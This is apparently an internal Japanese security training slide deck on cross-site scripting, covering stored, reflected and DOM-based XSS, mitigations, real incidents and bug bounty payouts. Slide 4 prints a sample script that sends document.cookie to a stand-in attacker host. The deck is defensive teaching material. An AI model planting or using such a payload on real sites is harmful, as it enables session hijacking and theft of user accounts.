研修用

1. セキュリティ勉強会 第3回
XSSについて

2. XSSって何？
• XSS(クロスサイトスクリプティング)
• 2種類(持続型XSS, 反射型XSS)
• DOMベース型XSSを合わせると3種類だが、反射型XSSの種類の中にDOMベース型
XSSがあってややこしいので、今回の説明では2種類とする
• 攻撃者が送り込んだ悪意のあるコードを実行させられる
• Javascriptだけではないので注意
• Imgタグが使われることも(<img src=“http:~”> </img>)
• 参考: https://owasp.org/www-community/Types̲of̲Cross-Site̲Scripting

3. 持続型XSS
• ずっとこびり付くやつ。掲示板とかで発生する。設置形式。
• サイトの改竄やCookie情報が盗まれるといった被害の発生。
• サーバサイドのコード不備で発生
WEBぺージ
1: javascript設置
2: 掲示板閲覧
攻撃者サーバー
3:Cookie情報の送信

4. 持続型XSS例
• 下記のコードはCookie情報を盗んで、用意したサーバに飛ばさせる
<script type='text/javascript'>
document.location='http://akui.com/stealCookie?cookie=' + document.cookie;
</script>

5. 反射型XSS
• 設置されない。その場で実行。
• 検索、エラーメッセージ等を使ってスクリプトを実行させる
1: URLにXSS仕込んでメールとして送信
WEBぺージ
2: メールのリンクからページへ遷移
3: 検索クエリパラメータのqをサーバ側で処理して
ページとして表示しscriptが発火
(サーバ側からのレスポンスにscriptが含まれる)
Railsのinstance変数とかにscript含まれて実行されたらコレ
http:page.com?q=“スクリプト”

6. 反射型XSS(DOM Based XSS版)
• DOMを使ったXSSのことを DOM Based XSS という。下記はDOM Based
XSSの例。
• 持続型XSSと違ってサーバとの通信が発生しないケースがある
• フロント側のコード不備で発生する
1: URLにXSS仕込んでメールとして送信
WEBぺージ
2: メールのリンクからページへ遷移
3: URLに組み込まれたスクリプトが発火
(サーバ側からのレスポンスにscriptが含まれない)
VueとかReact側に脆弱性があってscript実行されたらコレ
http:page.com?name=“スクリプト”
nameパラメータをサニタイズしないで表示しているページ

7. XSSの対策
• サニタイジングとして、エスケープ処理の実施
• cookieのHttponlyをtrueにする(緩和策。DOMの参照やAPI呼び出しは防げない)
• バリデーション
• Vueでv-html, ReactでdangerouslySetInnerHTMLを使わない。使うとしても
制限かけて、しっかりテスト。
• HTTPレスポンスヘッダのContent-typeフィールドに文字コードの設定を実施す
る。(UTF-７として解釈された場合、XSSを実行できてしまうブラウザがある。
参考: https://halkichi-web.hatenablog.com/entry/2019/05/04/215125)
• WAFの導入(DOM-Basedは防げないので注意)

8. • Youtube: デマニュースのポップアップが表示されるように改竄
• Twitter(X) : マウスカーソルを重ねたら自動的にテキストが投稿されるよう改
竄
• Amazon: AmazonのスピーカーAmazon EchoにXSS脆弱性が発生しアプリ
の強制ダウンロードが可能に
• 2020年度(7月~9月)に発覚した脆弱性のうち58％がXSS(参考: https://
www.secure-iv.co.jp/blog/2942)
実際に発生した事例

9. • Cybouz(kintone, cybouz.com): 10 ~ 40万円
• Cybouz(メールワイズ, Gracoon):5 ~ 20万円
• LINE: 7万円
• Google(アカウントページ): 110万円(URL: https://qiita.com/satoki/
items/de7217d9d6cbbfcb8aba
XSSのバグバウンティ